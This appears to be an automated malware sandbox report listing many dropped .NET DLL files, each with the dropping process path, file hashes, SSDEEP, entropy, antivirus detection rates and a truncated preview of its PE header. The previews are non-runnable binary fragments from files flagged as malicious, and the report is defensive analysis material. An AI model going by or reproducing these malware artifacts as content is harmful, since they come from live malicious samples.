                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):41472
                                                                                    Entropy (8bit):5.6808219961645605
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                    MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                    SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                    SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                    SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):50176
                                                                                    Entropy (8bit):5.723168999026349
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                    MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                    SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                    SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                    SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):69632
                                                                                    Entropy (8bit):5.932541123129161
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):32256
                                                                                    Entropy (8bit):5.631194486392901
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):46592
                                                                                    Entropy (8bit):5.870612048031897
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                    MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                    SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                    SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                    SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):33792
                                                                                    Entropy (8bit):5.541771649974822
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 38%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):38400
                                                                                    Entropy (8bit):5.699005826018714
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                    MD5:87765D141228784AE91334BAE25AD743
                                                                                    SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                    SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                    SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):46592
                                                                                    Entropy (8bit):5.870612048031897
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                    MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                    SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                    SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                    SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):33792
                                                                                    Entropy (8bit):5.541771649974822
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 38%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):32256
                                                                                    Entropy (8bit):5.631194486392901
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):23552
                                                                                    Entropy (8bit):5.519109060441589
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):28160
                                                                                    Entropy (8bit):5.570953308352568
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                                                    MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                                                    SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                                                    SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                                    SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):23552
                                                                                    Entropy (8bit):5.529329139831718
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                    MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                    SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                    SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                    SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):39936
                                                                                    Entropy (8bit):5.660491370279985
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                    MD5:240E98D38E0B679F055470167D247022
                                                                                    SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                    SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                    SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):40448
                                                                                    Entropy (8bit):5.7028690200758465
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                    MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                    SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                    SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                    SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):38400
                                                                                    Entropy (8bit):5.699005826018714
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                    MD5:87765D141228784AE91334BAE25AD743
                                                                                    SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                    SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                    SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):50176
                                                                                    Entropy (8bit):5.723168999026349
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                    MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                    SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                    SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                    SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):64000
                                                                                    Entropy (8bit):5.857602289000348
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                    MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                    SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                    SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                    SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):294912
                                                                                    Entropy (8bit):6.010605469502259
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                    MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                    SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                    SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                    SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 11%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):40448
                                                                                    Entropy (8bit):5.7028690200758465
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                    MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                    SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                    SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                    SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):85504
                                                                                    Entropy (8bit):5.8769270258874755
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
